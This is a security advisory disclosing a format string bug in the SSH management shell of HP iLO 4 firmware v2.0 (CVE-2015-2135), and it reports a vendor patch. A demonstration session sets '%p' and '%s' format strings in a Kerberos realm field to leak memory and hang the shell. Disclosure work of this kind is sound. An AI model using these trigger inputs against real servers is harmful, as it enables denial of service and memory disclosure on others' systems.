SecuriTeam Secure Disclosure

SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.

Introduction

HP Proliant Servers provide an embedded operating system running on a separate CPU called iLO (Integrated Lights Out). It provides various networking and management features for the server.

Vulnerability Details

HP iLO runs an SSH server by default, and users who log in are dropped into a special isolated type of shell. There is a format string vulnerability triggered by the “show” command which allows a low-level user account to cause a denial of service on the service or potentially execute arbitrary code.



Analysis

Users and Administrators for the server can login and are dropped into an isolated “hpiLO” shell. This shell is unlike a bash or sh environment and more like an isolated CLI. It exposes various commands and verbage to perform operations.



A user with “config” privileges has the right to modify a set of configuration variables for the server. This privilege, while considered by iLO to be minimal (as seen below), is essential to provide a vector for triggering the bug.



Selecting some other privileges for the user account above result in the privilege level being upgraded to “operator” or “administrator”. But, only “user” privileges, with “Configure iLO Settings” enabled will allow us to modify some variable to which we can “show” afterwards to trigger the format string.

Technical Details

Here’s a demonstration session logged in as user “test”. Output has been snipped for brevity.

</>hpiLO-> show -a /map1/accounts1 /map1/accounts1/Administrator Targets Properties username=Administrator password=******** name=Administrator group=admin,config,oemhp_rc,oemhp_power,oemhp_vm sshkeyhash=<No SSH public key installed> /map1/accounts1/test Targets Properties username=test password=******** name=test group=config sshkeyhash=<No SSH public key installed> </>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm /map1/oemhp_dircfg1 Properties oemhp_dir_kerberos_realm=test Format String Trigger (Impact: Memory Disclosure) </>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%p %p %p %p" Directory settings modified. </>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm /map1/oemhp_dircfg1 Properties oemhp_dir_kerberos_realm=0 976e 0 25207025 Format String Trigger (Impact: Denial of Service) </>hpiLO-> set /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm="%s%s%s%s" Directory settings modified. </>hpiLO-> show /map1/oemhp_dircfg1 oemhp_dir_kerberos_realm /map1/oemhp_dircfg1 Properties […. shell stops responding]

If we disconnect and log back in, the shell will not respond to commands. Without root access to the machine, it’s hard to say what privileges the shell is running under. But, we can make an infer that it’s running at a different, likely higher (possibly root) privileged account, as triggering the bug and crashing the shell as user “test” has the same unresponsive effect on “administrator”. Eg. Disconnecting the session and re-logging back in after the DoS trigger leaves an unresponsive shell with “test” and “administrator” alike.

Affected Versions

HP iLO version 4 firmware v2.0

HP iLO version 4 Advanced firmware v2.0

Vendor Response

The vendor has been notified on July 2015 and have released a patch for this vulnerability, HP Intelligent Provisioning, Remote Code Execution, Unauthorized Access.

CVE

A single CVE entry has been assigned to this vulnerability, CVE-2015-2135.